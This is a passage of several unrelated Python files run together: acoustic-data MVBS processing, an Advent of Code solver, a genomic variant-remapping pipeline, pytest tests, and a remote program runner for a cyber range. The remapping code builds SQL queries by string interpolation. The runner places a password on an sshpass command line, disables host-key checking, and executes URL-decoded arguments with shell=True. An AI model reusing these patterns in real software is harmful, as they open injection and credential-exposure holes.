use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
MVBS_range_bin_size : float, optional
meters per tile for calculating MVBS [m]
MVBS_ping_size : int, optional
number of pings per tile for calculating MVBS
save : bool, optional
whether to save the calculated MVBS into a new .nc file, default to ``False``
save_postfix : str
Filename postfix, default to '_MVBS'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_MVBS.nc default
"""
# Check params
if (MVBS_range_bin_size is not None) and (self.MVBS_range_bin_size != MVBS_range_bin_size):
self.MVBS_range_bin_size = MVBS_range_bin_size
if (MVBS_ping_size is not None) and (self.MVBS_ping_size != MVBS_ping_size):
self.MVBS_ping_size = MVBS_ping_size
# Get Sv by validating path and calibrate if not already done
if self.Sv is not None:
print('%s use Sv stored in memory to calculate MVBS' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
if self.Sv_path is not None:
print('%s Sv source used to calculate MVBS: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
else:
print('%s Sv source used to calculate MVBS: memory' %
dt.datetime.now().strftime('%H:%M:%S'))
# Get tile indexing parameters
self.MVBS_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.MVBS_range_bin_size,
p_tile_sz=self.MVBS_ping_size,
sample_thickness=self.sample_thickness)
# Calculate MVBS
Sv_linear = 10 ** (proc_data.Sv / 10) # convert to linear domain before averaging
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
MVBS = 10 * np.log10(Sv_linear.coarsen(
ping_time=self.MVBS_ping_size,
range_bin=int(np.unique(self.MVBS_range_bin_size / self.sample_thickness)),
boundary='pad').mean())
MVBS.coords['range_bin'] = ('range_bin', np.arange(MVBS['range_bin'].size))
else:
range_bin_coarsen_idx = (self.MVBS_range_bin_size / self.sample_thickness).astype(int)
tmp_MVBS = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(Sv_linear.sel(frequency=freq).coarsen(
ping_time=self.MVBS_ping_size,
range_bin=r_bin.values,
boundary='pad').mean())
tmp_da.coords['range_bin'] = ('range_bin', np.arange(tmp_da['range_bin'].size))
tmp_da.name = 'MVBS'
tmp_MVBS.append(tmp_da)
# Construct a dataArray TODO: this can probably be done smarter using xarray native functions
MVBS_val = np.array([zz.values for zz in xr.align(*tmp_MVBS, join='outer')])
MVBS = xr.DataArray(MVBS_val,
coords={'frequency': Sv_linear['frequency'].values,
'ping_time': tmp_MVBS[0]['ping_time'].values,
'range_bin': np.arange(MVBS_val.shape[2])},
dims=['frequency', 'ping_time', 'range_bin']).dropna(dim='range_bin', how='all')
# Set MVBS attributes
MVBS.name = 'MVBS'
MVBS = MVBS.to_dataset()
MVBS['MVBS_range_bin_size'] = ('frequency', self.MVBS_range_bin_size)
MVBS.attrs['MVBS_ping_size'] = self.MVBS_ping_size
# Save results in object and as a netCDF file
self.MVBS = MVBS
if save:
self.MVBS_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving MVBS to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.MVBS_path))
MVBS.to_netcdf(self.MVBS_path)
# Close opened resources
proc_data.close()
|
from math import copysign, isnan
import numpy as np
test = False
with open(f"../input/{'test_' if test else ''}day7.txt") as f:
# :pinchers:
crabs = np.array([int(x) for x in f.read().strip().split(",")])
def sim_p1(h):
# d/dh | x - h | = sgn(h - x)
return np.sum(np.abs(crabs - h)), np.sum(np.sign(h - crabs))
def sim_p2(h):
# let k = |x_i - h|
# cost = k * (k + 1) / 2
# so d/dh = sgn(h - x) / 2 + (h - x)
d = np.abs(crabs - h)
err = np.sum((d * (d + 1)) / 2)
dh = np.sum(.5 * np.sign(h - crabs) + (h - crabs))
return err, dh
def solve(sim):
# very random
sol = 5
alpha = .00005
for i in range(100000):
err, dh = sim(sol)
if abs(dh) < 1e-4:
break
sol -= dh * alpha
err, _ = sim(round(sol))
print(f"sol: {sol} -> {round(sol)}, err: {err}")
if __name__ == "__main__":
solve(sim_p1)
solve(sim_p2)
|
#!/usr/bin/python
import time
from org.apache.pig.scripting import *
__author__ = 'wangwei'
def getParams():
params=[]
cdate=startDate
while cmp(cdate, endDate) != 0:
d={"DATE":cdate}
params.append(d)
timeArray = time.strptime(cdate, "%Y-%m-%d")
timeStamp = int(time.mktime(timeArray))
timeStamp += 86400
timeArray = time.localtime(timeStamp)
cdate = time.strftime("%Y-%m-%d", timeArray)
return params
if __name__ == '__main__':
startDate = '2014-08-01'
endDate = '2014-08-14' #not include in
Pig.registerUDF("./getDateHour.py", "timeUDFS")
pig = Pig.compileFromFile('./priceFluctuate.pig')
bound = pig.bind(getParams())
bound.run()
|
#!/usr/bin/env python
import os
import re
import subprocess
import sys
from argparse import ArgumentParser, ArgumentError
from datetime import datetime
import yaml
from ebi_eva_common_pyutils import command_utils
from ebi_eva_common_pyutils.command_utils import run_command_with_output
from ebi_eva_common_pyutils.config import cfg
from ebi_eva_common_pyutils.config_utils import get_primary_mongo_creds_for_profile, get_accession_pg_creds_for_profile
from ebi_eva_common_pyutils.logger import logging_config, AppLogger
from ebi_eva_common_pyutils.metadata_utils import get_metadata_connection_handle
from ebi_eva_common_pyutils.pg_utils import get_all_results_for_query, execute_query
sys.path.append(os.path.dirname(__file__))
from remapping_config import load_config
def pretty_print(header, table):
cell_widths = [len(h) for h in header]
for row in table:
for i, cell in enumerate(row):
cell_widths[i] = max(cell_widths[i], len(str(cell)))
format_string = ' | '.join('{%s:>%s}' % (i, w) for i, w in enumerate(cell_widths))
print('| ' + format_string.format(*header) + ' |')
for row in table:
print('| ' + format_string.format(*row) + ' |')
class RemappingJob(AppLogger):
@staticmethod
def write_remapping_process_props_template(template_file_path):
mongo_host, mongo_user, mongo_pass = get_primary_mongo_creds_for_profile(cfg['maven']['environment'],
cfg['maven']['settings_file'])
pg_url, pg_user, pg_pass = get_accession_pg_creds_for_profile(cfg['maven']['environment'],
cfg['maven']['settings_file'])
with open(template_file_path, 'w') as open_file:
open_file.write(f'''spring.datasource.driver-class-name=org.postgresql.Driver
spring.datasource.url={pg_url}
spring.datasource.username={pg_user}
spring.datasource.password={pg_pass}
spring.datasource.tomcat.max-active=3
spring.jpa.generate-ddl=true
spring.data.mongodb.host={mongo_host}
spring.data.mongodb.port=27017
spring.data.mongodb.database=eva_accession_sharded
spring.data.mongodb.username={mongo_user}
spring.data.mongodb.password={mongo_pass}
spring.data.mongodb.authentication-database=admin
mongodb.read-preference=secondaryPreferred
spring.main.web-environment=false
spring.main.allow-bean-definition-overriding=true
spring.jpa.properties.hibernate.jdbc.lob.non_contextual_creation=true
logging.level.uk.ac.ebi.eva.accession.remapping=INFO
parameters.chunkSize=1000
''')
return template_file_path
def get_job_information(self, assembly, taxid):
query = (
'SELECT source, scientific_name, assembly_accession, remapping_status, SUM(num_studies), '
'SUM(num_ss_ids) '
'FROM eva_progress_tracker.remapping_tracker '
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}' "
'GROUP BY source, origin_assembly_accession, scientific_name, assembly_accession, remapping_status'
)
source_set = set()
progress_set = set()
scientific_name = None
target_assembly = None
n_study = 0
n_variants = 0
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
for source, scientific_name, target_assembly, progress_status, n_st, n_var in get_all_results_for_query(pg_conn, query):
source_set.add(source)
if progress_status:
progress_set.add(progress_status)
n_study += n_st
n_variants += n_var
sources = ', '.join(source_set)
if progress_set:
progress_status = ', '.join(progress_set)
else:
progress_status = 'Pending'
return sources, scientific_name, target_assembly, progress_status, n_study, n_variants
def list_assemblies_to_process(self):
query = 'SELECT DISTINCT origin_assembly_accession, taxonomy FROM eva_progress_tracker.remapping_tracker'
header = ['Sources', 'Scientific_name', 'Assembly', 'Taxonom ID', 'Target Assembly', 'Progress Status',
'Numb Of Study', 'Numb Of Variants']
rows = []
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
for assembly, taxid in get_all_results_for_query(pg_conn, query):
sources, scientific_name, target_assembly, progress_status, n_study, n_variants = \
self.get_job_information(assembly, taxid)
rows.append([sources, scientific_name, assembly, taxid, target_assembly, progress_status, n_study, n_variants])
# print('\t'.join(str(e) for e in [sources, scientific_name, assembly, taxid, target_assembly, progress_status, n_study, n_variants]))
pretty_print(header, rows)
def set_status_start(self, assembly, taxid):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_status='Started', remapping_start = '{datetime.now().isoformat()}' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_status_end(self, assembly, taxid):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_status='Completed', remapping_end = '{datetime.now().isoformat()}' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_status_failed(self, assembly, taxid):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_status = 'Failed' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_counts(self, assembly, taxid, source, nb_variant_extracted=None, nb_variant_remapped=None,
nb_variant_ingested=None):
set_statements = []
query = (f"SELECT * FROM eva_progress_tracker.remapping_tracker "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}' AND source='{source}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
# Check that this row exists
results = get_all_results_for_query(pg_conn, query)
if results:
if nb_variant_extracted is not None:
set_statements.append(f"num_ss_extracted = {nb_variant_extracted}")
if nb_variant_remapped is not None:
set_statements.append(f"num_ss_remapped = {nb_variant_remapped}")
if nb_variant_ingested is not None:
set_statements.append(f"num_ss_ingested = {nb_variant_ingested}")
if set_statements:
query = ('UPDATE eva_progress_tracker.remapping_tracker '
'SET ' + ', '.join(set_statements) + ' '
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}' AND source='{source}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def set_version(self, assembly, taxid, remapping_version=1):
query = ('UPDATE eva_progress_tracker.remapping_tracker '
f"SET remapping_version='{remapping_version}' "
f"WHERE origin_assembly_accession='{assembly}' AND taxonomy='{taxid}'")
with get_metadata_connection_handle(cfg['maven']['environment'], cfg['maven']['settings_file']) as pg_conn:
execute_query(pg_conn, query)
def check_processing_required(self, assembly, target_assembly, n_variants):
if str(target_assembly) != 'None' and assembly != target_assembly and int(n_variants) > 0:
return True
return False
def process_one_assembly(self, assembly, taxid, resume):
self.set_status_start(assembly, taxid)
base_directory = cfg['remapping']['base_directory']
sources, scientific_name, target_assembly, progress_status, n_study, n_variants = self.get_job_information(assembly, taxid)
if not self.check_processing_required(assembly, target_assembly, n_variants):
self.info(f'Not Processing assembly {assembly} -> {target_assembly} for taxonomy {taxid}: '
f'{n_study} studies with {n_variants} '
f'found in {sources}')
self.set_status_end(assembly, taxid)
return
self.info(f'Process assembly {assembly} for taxonomy {taxid}: {n_study} studies with {n_variants} '
f'found in {sources}')
nextflow_remapping_process = os.path.join(os.path.dirname(__file__), 'remapping_process.nf')
assembly_directory = os.path.join(base_directory, taxid, assembly)
work_dir = os.path.join(assembly_directory, 'work')
prop_template_file = os.path.join(assembly_directory, 'template.properties')
os.makedirs(work_dir, exist_ok=True)
remapping_log = os.path.join(assembly_directory, 'remapping_process.log')
remapping_config_file = os.path.join(assembly_directory, 'remapping_process_config_file.yaml')
remapping_config = {
'taxonomy_id': taxid,
'source_assembly_accession': assembly,
'target_assembly_accession': target_assembly,
'species_name': scientific_name,
'output_dir': assembly_directory,
'genome_assembly_dir': cfg['genome_downloader']['output_directory'],
'template_properties': self.write_remapping_process_props_template(prop_template_file),
'remapping_config': cfg.config_file
}
for part in ['executable', 'nextflow', 'jar']:
remapping_config[part] = cfg[part]
with open(remapping_config_file, 'w') as open_file:
yaml.safe_dump(remapping_config, open_file)
try:
command = [
cfg['executable']['nextflow'],
'-log', remapping_log,
'run', nextflow_remapping_process,
'-params-file', remapping_config_file,
'-work-dir', work_dir
]
if resume:
command.append('-resume')
curr_working_dir = os.getcwd()
os.chdir(assembly_directory)
command_utils.run_command_with_output('Nextflow remapping process', ' '.join(command))
except subprocess.CalledProcessError as e:
self.error('Nextflow remapping pipeline failed')
self.set_status_failed(assembly, taxid)
raise e
finally:
os.chdir(curr_working_dir)
self.set_status_end(assembly, taxid)
self.count_variants_from_logs(assembly_directory, assembly, taxid)
self.set_version(assembly, taxid)
def count_variants_from_logs(self, assembly_directory, assembly, taxid):
vcf_extractor_log = os.path.join(assembly_directory, 'logs', assembly + '_vcf_extractor.log')
eva_remapping_count = os.path.join(assembly_directory, 'eva', assembly + '_eva_remapped_counts.yml')
dbsnp_remapping_count = os.path.join(assembly_directory, 'dbsnp', assembly + '_dbsnp_remapped_counts.yml')
eva_ingestion_log = os.path.join(assembly_directory, 'logs', assembly + '_eva_remapped.vcf_ingestion.log')
dbsnp_ingestion_log = os.path.join(assembly_directory, 'logs', assembly + '_dbsnp_remapped.vcf_ingestion.log')
eva_total, eva_written, dbsnp_total, dbsnp_written = count_variants_extracted(vcf_extractor_log)
eva_candidate, eva_remapped, eva_unmapped = count_variants_remapped(eva_remapping_count)
dbsnp_candidate, dbsnp_remapped, dbsnp_unmapped = count_variants_remapped(dbsnp_remapping_count)
# Use the number of variant read rather than the number of variant ingested to get the total number of variant
# when some might have been written in previous execution.
eva_ingestion_candidate, eva_ingested, eva_duplicates = count_variants_ingested(eva_ingestion_log)
dbsnp_ingestion_candidate, dbsnp_ingested, dbsnp_duplicates = count_variants_ingested(dbsnp_ingestion_log)
self.set_counts(
assembly, taxid, 'EVA',
nb_variant_extracted=eva_written,
nb_variant_remapped=eva_remapped,
nb_variant_ingested=eva_ingestion_candidate
)
self.set_counts(
assembly, taxid, 'DBSNP',
nb_variant_extracted=dbsnp_written,
nb_variant_remapped=dbsnp_remapped,
nb_variant_ingested=dbsnp_ingestion_candidate
)
self.info(f'For Taxonomy: {taxid} and Assembly: {assembly} Source: EVA ')
self.info(f'Number of variant read:{eva_total}, written:{eva_written}, attempt remapping: {eva_candidate}, '
f'remapped: {eva_remapped}, failed remapped {eva_unmapped}')
self.info(f'For Taxonomy: {taxid} and Assembly: {assembly} Source: DBSNP ')
self.info(f'Number of variant read:{dbsnp_total}, written:{dbsnp_written}, attempt remapping: {dbsnp_candidate}, '
f'remapped: {dbsnp_remapped}, failed remapped {dbsnp_unmapped}')
def count_variants_remapped(count_yml_file):
with open(count_yml_file) as open_file:
data = yaml.safe_load(open_file)
candidate_variants = data.get('all')
remapped_variants = data.get('Flank_50', {}).get('Remapped', 0) + \
data.get('Flank_2000', {}).get('Remapped', 0) + \
data.get('Flank_50000', {}).get('Remapped', 0)
unmapped_variants = data.get('filtered') or 0 + \
(data.get('Flank_50000', {}).get('total', 0) - data.get('Flank_50000', {}).get('Remapped', 0))
return candidate_variants, remapped_variants, unmapped_variants
def parse_log_line(line, regex_list=None):
if not regex_list:
regex_list = [r'Items read = (\d+)', r'items written = (\d+)']
results = []
for regex in regex_list:
match = re.search(regex, line)
if match:
results.append(int(match.group(1)))
else:
results.append(None)
return tuple(results)
def count_variants_extracted(extraction_log):
command = f'grep "EXPORT_EVA_SUBMITTED_VARIANTS_STEP" {extraction_log} | tail -1'
log_line = run_command_with_output('Get total number of eva variants written', command, return_process_output=True)
eva_total, eva_written = parse_log_line(log_line)
command = f'grep "EXPORT_DBSNP_SUBMITTED_VARIANTS_STEP" {extraction_log} | tail -1'
log_line = run_command_with_output('Get total number of dbsnp variants written', command, return_process_output=True)
dbsnp_total, dbnp_written = parse_log_line(log_line)
return eva_total, eva_written, dbsnp_total, dbnp_written
def count_variants_ingested(ingestion_log):
command = f'grep "INGEST_REMAPPED_VARIANTS_FROM_VCF_STEP" {ingestion_log} | tail -1'
log_line = run_command_with_output('Get total number of variants written', command, return_process_output=True)
regex_list = [r'Items \(remapped ss\) read = (\d+)', r'ss ingested = (\d+)', r'ss skipped \(duplicate\) = (\d+)']
ss_read, ss_written, ss_duplicates = parse_log_line(log_line, regex_list)
return ss_read, ss_written, ss_duplicates
def main():
argparse = ArgumentParser(description='Run entire variant remapping pipeline for a given assembly and taxonomy.')
argparse.add_argument('--assembly', help='Assembly to be process')
argparse.add_argument('--taxonomy_id', help='Taxonomy id to be process')
argparse.add_argument('--list_jobs', help='Display the list of jobs to be run.', action='store_true', default=False)
argparse.add_argument('--resume', help='If a process has been run already this will resume it.',
action='store_true', default=False)
args = argparse.parse_args()
load_config()
if args.list_jobs:
RemappingJob().list_assemblies_to_process()
elif args.assembly and args.taxonomy_id:
logging_config.add_stdout_handler()
RemappingJob().process_one_assembly(args.assembly, args.taxonomy_id, args.resume)
else:
raise ArgumentError('One of (--assembly and --taxonomy_id) or --list_jobs options is required')
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""
:Author: Dominic
"""
import sys
sys.path.append("../")
import pytest
import itertools
import numpy as np
from fitAlgs.fitAlg import FitAlg
from modelGenerator import ModelGen
from fitAlgs.fitSims import FitSim
@pytest.fixture(scope="function")
def model_setup():
number_actions = 2
number_cues = 1
model_parameters = {'alpha': (0, 1),
'beta': (0, 30)}
model_static_args = {'number_actions': number_actions,
'number_cues': number_cues,
'action_codes': {1: 0, 2: 1},
'expect': np.full(number_actions, 0.5, float),
'prior': np.full(number_actions, 1 / number_actions, float),
'stimulus_shaper_name': 'StimulusDecksLinear',
'reward_shaper_name': 'RewardDecksNormalised',
'decision_function_name': 'weightProb',
'task_responses': [1, 2]}
models = ModelGen(model_name='QLearn',
parameters=model_parameters,
other_options=model_static_args)
modelInfos = [m for m in models.iter_details()]
modelInfo = modelInfos[0]
model = modelInfo[0]
modelSetup = modelInfo[1:]
return model, modelSetup
@pytest.fixture(scope='function')
def sim_setup():
fit_sim = FitSim(participant_choice_property='Choices',
participant_reward_property='Rewards',
model_fitting_variable='ActionProb',
task_stimuli_property=None,
fit_subset=None,
action_options_property=[1, 2])
return fit_sim
@pytest.fixture(scope='session')
def participant_data_setup():
participant_data = {'Rewards': [1.0, 0.0, 0.0, 1.0, 0.0, 1.0, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
'Stimuli': [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
'non_action': u'None',
'valid_actions_combined': [['E', 'F'], ['E', 'F'], ['A', 'B'], ['E', 'F'], ['E', 'F'],
['E', 'F'], ['D', 'B'], ['E', 'D'], ['C', 'B'], ['E', 'C'],
['A', 'D'], ['A', 'F']],
'simID': '0',
'Decisions': ['E', 'F', 'B', 'E', 'E', 'F', 'D', 'E', 'C', 'C', 'A', 'A'],
'Choices': [1, 2, 2, 1, 1, 2, 2, 1, 1, 2, 2, 2]}
return participant_data
class TestClass_fitAlg:
def test_FA_none(self):
with pytest.raises(NameError, match='Please specify bounds for your parameters'):
fit_alg = FitAlg()
def test_FA_bounds(self):
fit_alg = FitAlg(bounds={'alpha': (0, 1), 'beta': (0, np.inf)})
assert isinstance(fit_alg, FitAlg)
def test_FA_info(self):
bounds = {'alpha': (0, 1), 'beta': (0, np.inf)}
fit_alg = FitAlg(bounds=bounds)
results = fit_alg.info()
correct_results_alg = {'Name': 'FitAlg',
'fit_measure_function': '-loge',
'fit_measure_arguments': {},
'boundary_cost_function': None,
'bounds': bounds,
'extra_fit_measures': [],
'calculate_covariance': False,
'bound_ratio': 10**-6}
correct_results_sim = {'Name': 'FitSim',
'participant_choice_property': 'Actions',
'participant_reward_property': 'Rewards',
'task_stimuli_property': None,
'action_options_property': None,
'model_fitting_variable': 'ActionProb',
'float_error_response_value': 10 ** -100,
'fit_subset': None}
for res_key, res_val in results.items():
if res_key == 'FitSim':
for sim_key, sim_val in results[res_key].items():
assert sim_val == correct_results_sim[sim_key]
else:
assert res_val == correct_results_alg[res_key]
def test_FA_basic(self, sim_setup):
fit_alg = FitAlg(fit_sim=sim_setup,
fit_measure='-loge',
fit_measure_args={"numParams": 2,
"number_actions": 2,
"qualityThreshold": 20,
"randActProb": 1/2},
extra_fit_measures=['-2log', 'BIC', 'r2', 'bayesFactor', 'BIC2norm'],
bounds={'alpha': (0, 1), 'beta': (0, np.inf)})
assert isinstance(fit_alg, FitAlg)
if __name__ == '__main__':
pytest.main()
# pytest.set_trace()
|
class Memory:
def __init__(self, sizeInBytes):
self.array = bytearray(sizeInBytes)
def get(self, address):
return self.array[address]
def get16(self, address):
return (self.array[address] << 8) + self.array[address+1]
def set(self, address, value):
self.array[address] = value
def set16(self, address, value):
self.array[address] = value >> 8
self.array[address+1] = value - (self.array[address] << 8)
|
#!/usr/bin/python
import sys
import subprocess
import urllib
from limitedstringqueue import LimitedStringQueue
PROGRAM = sys.argv[1]
COMPILER = sys.argv[2]
#ARGS = sys.argv[3]
ARGS = urllib.unquote(sys.argv[3])
IMAGE_ADDR = sys.argv[4]
IMAGE_PASSWD = sys.argv[5]
LOG_FILE = sys.argv[6]
OS_TYPE=sys.argv[7]
EXECID = sys.argv[8]
# this program is for executing outside program on cyber range
class RunProgram():
# this def allows program to run shell commands in python
def execute_command(self, command):
#p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=None)
q = LimitedStringQueue()
with open(LOG_FILE, "a") as myfile:
for line in p.stdout.readlines():
q.push(line)
myfile.write(line,)
myfile.write("\n") # separate previous outputs
myfile.write("exec-result: "+EXECID+" "+q.concaturlenc())
myfile.write("\n") # separate following outputs
# Waiting for a return code would not allow background execution, so we don't do it
# execute commands to run the program on cyber range
def runProgram(self):
program_compiler = ""
# get the appropriate compiler
if COMPILER == "python":
program_compiler = "python"
if COMPILER == "ruby":
program_compiler = "ruby"
if COMPILER == "powershell":
program_compiler = "powershell"
if COMPILER == "bash":
program_compiler = "bash"
# process args
if ARGS == "none":
program_args = ""
else:
program_args = ARGS
# execute program on virtual machine
defined_aws_version = ["amazon_linux", "amazon_linux2", "red_hat", "ubuntu_16", "ubuntu_18", "ubuntu_20"]
if OS_TYPE=="windows.7":
command = "sshpass -p {0} ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@{1} {2} \"{3}\" {4}".format(IMAGE_PASSWD, IMAGE_ADDR, program_compiler, PROGRAM, program_args)
elif OS_TYPE in defined_aws_version:
command = "sshpass -p {0} ssh -i TESTKEY.pem -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ec2-user@{1} {2} {3} {4}".format(IMAGE_PASSWD, IMAGE_ADDR, program_compiler, PROGRAM, program_args)
else:
command = "sshpass -p {0} ssh -E /dev/null -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@{1} {2} '{3} {4}'".format(IMAGE_PASSWD, IMAGE_ADDR, program_compiler, PROGRAM, program_args)
self.execute_command(command)
print command
runProgram = RunProgram()
runProgram.runProgram()
|
import numpy as np
import json
from vis_utils.scene.components import ComponentBase
import socket
import threading
import time
import sys
from vis_utils import constants
STANDARD_DT=1.0/120
def write_to_json_file(filename, serializable, indent=4):
with open(filename, 'w') as outfile:
print("save to ", filename)
tmp = json.dumps(serializable, indent=4)
outfile.write(tmp)
outfile.close()
def to_unity_frame(skeleton, frame, animated_joints, scale, action, events, is_idle=True, success=True):
unity_frame = {"rotations": [], "rootTranslation": None, "action": action, "events": events, "isIdle": is_idle, "success": success}
for node_name in skeleton.nodes.keys():
if node_name in animated_joints:
node = skeleton.nodes[node_name]
if node_name == skeleton.root:
t = frame[:3] * scale
unity_frame["rootTranslation"] = {"x": -t[0], "y": t[1], "z": t[2]}
if node_name in skeleton.animated_joints: # use rotation from frame
# TODO fix: the animated_joints is ordered differently than the nodes list for the latest model
index = skeleton.animated_joints.index(node_name)
offset = index * 4 + 3
r = frame[offset:offset + 4]
unity_frame["rotations"].append({"x": -r[1], "y": r[2], "z": r[3], "w": -r[0]})
else: # use fixed joint rotation
r = node.rotation
unity_frame["rotations"].append(
{"x": -float(r[1]), "y": float(r[2]), "z": float(r[3]), "w": -float(r[0])})
return unity_frame
def parse_message(input_bytes):
""" decoode byte into utf-8 string until 0x00 is found"""
n_bytes = len(input_bytes)
start_offset = 0
end_offset = 0
msg_str = ""
while start_offset < n_bytes and start_offset < n_bytes:
while end_offset < n_bytes and input_bytes[end_offset] != 0x00:
end_offset += 1
msg_str += bytes.decode(input_bytes[start_offset:end_offset], "utf-8")
start_offset = end_offset + 1
return msg_str
def find_header_of_message(conn):
LEN = 0
data = b''
header_received = False
while not header_received:
len_msg = conn.recv(1)
data += len_msg
if len(data) == 4:
LEN = int.from_bytes(data, 'big')
# print("Length: " + str(LEN))
data = b''
header_received = True
while len(data) < LEN*2:
byte = conn.recv(1)
data += byte
return data
def parse_client_message(server, client_msg_str):
try:
if client_msg_str.startswith("Input:"):
idx = len("Input:")
input_key = client_msg_str[idx:idx + 1]
server.input_key = input_key
elif client_msg_str.startswith("Direction:"):
idx = len("Direction:")
#print("recieved", client_msg_str[idx:])
vec = json.loads(client_msg_str[idx:])
server.set_direction(np.array([vec["x"], vec["y"], vec["z"]]))
elif client_msg_str.startswith("Action:"):
idx = len("Action:")
action = json.loads(client_msg_str[idx:])
p = action["position"]
if action["keyframe"] != "" and action["joint"] != "":
position = np.array([p["x"], p["y"], p["z"]])
else:
position = None
server.schedule_action(action, position)
elif client_msg_str.startswith("SetPose:"):
idx = len("SetPose:")
print("setting pose", idx)
pose = json.loads(client_msg_str[idx:])
p = pose["position"]
q = pose["orientation"]
server.set_avatar_orientation(np.array([q["w"],q["x"], q["y"], q["z"]]))
server.set_avatar_position(np.array([p["x"], p["y"], p["z"]]))
if "forceWalkEndConstraints" in pose:
print("force constraints", pose["forceWalkEndConstraints"])
server.animation_src.planner.settings.force_walk_end_targets = pose["forceWalkEndConstraints"]
elif client_msg_str.startswith("ActionPath:"):
#print("received", client_msg_str)
idx = len("ActionPath:")
action_desc = json.loads(client_msg_str[idx:])
action_desc = convert_dicts_to_numpy(action_desc)
server.schedule_action_path(action_desc)
elif client_msg_str.startswith("ActionSequence:"):
print("received", client_msg_str)
idx = len("ActionSequence:")
action_sequence_desc = json.loads(client_msg_str[idx:])
_action_sequence_desc = []
for action_desc in action_sequence_desc:
action_desc = convert_dicts_to_numpy(action_desc)
_action_sequence_desc.append(action_desc)
server.schedule_action_sequence(_action_sequence_desc)
elif client_msg_str.startswith("DirectionSequence:"):
print("received", client_msg_str)
idx = len("DirectionSequence:")
dir_sequence_desc = json.loads(client_msg_str[idx:])
_dir_sequence_desc = []
for action_desc in dir_sequence_desc:
action_desc = convert_dicts_to_numpy(action_desc)
_dir_sequence_desc.append(action_desc)
server.schedule_direction_sequence(_dir_sequence_desc)
elif client_msg_str.startswith("SetScene:"):
print("received", client_msg_str)
idx = len("SetScene:")
scene_desc = json.loads(client_msg_str[idx:])
server.set_scene_from_desc(scene_desc)
print("finished building scene")
elif client_msg_str.startswith("Unpause"):
server.unpause_motion()
elif client_msg_str.startswith("PlayClip:"):
idx = len("PlayClip:")
action_desc = json.loads(client_msg_str[idx:])
clip_name = action_desc["clip_name"]
server.play_clip(clip_name)
elif client_msg_str.startswith("HandleCollision"):
server.handle_collision()
except Exception as e:
print("Exception:",e.args)
sys.exit(0)
def receive_client_message(server, conn):
if server.search_message_header:
input_bytes = find_header_of_message(conn)
client_msg_str = bytes.decode(input_bytes, "utf-8")
take = False
tmp = client_msg_str
client_msg_str = ""
for char in tmp:
if take:
client_msg_str += char
take = False
else:
take = True
# print(client_msg_str)
else:
input_bytes = conn.recv(server.buffer_size)
client_msg_str = parse_message(input_bytes)
parse_client_message(server, client_msg_str)
def convert_dicts_to_numpy(action_desc):
for key in ["orientationVector", "lookAtTarget", "spineTarget","direction"]:
if key in action_desc:
v = action_desc[key]
action_desc[key] = np.array([v["x"], v["y"], v["z"]])
if "controlPoints" in action_desc:
control_points = []
for p in action_desc["controlPoints"]:
control_points.append([p["x"], p["y"], p["z"]])
action_desc["controlPoints"] = control_points
if "frameConstraints" in action_desc:
for c in action_desc["frameConstraints"]:
p = c["position"]
c["position"] = np.array([p["x"], p["y"], p["z"]])
q = c["orientation"]
c["orientation"] = np.array([q["w"], q["x"], q["y"], q["z"]])
if "offset" in c:
o = c["offset"]
c["offset"] = np.array([o["x"], o["y"], o["z"], 1])
if "vectorToParent" in c:
v = c["vectorToParent"]
c["vectorToParent"] = np.array([v["x"], v["y"], v["z"]])
if "toolEndPoint" in c:
o = c["toolEndPoint"]
c["toolEndPoint"] = np.array([o["x"], o["y"], o["z"]])
if "srcToolCos" in c:
for a in ["x","y"]:
if a in c["srcToolCos"]:
o = c["srcToolCos"][a]
c["srcToolCos"][a] = np.array([o["x"], o["y"], o["z"]])
if np.linalg.norm(c["srcToolCos"][a]) <= 0:
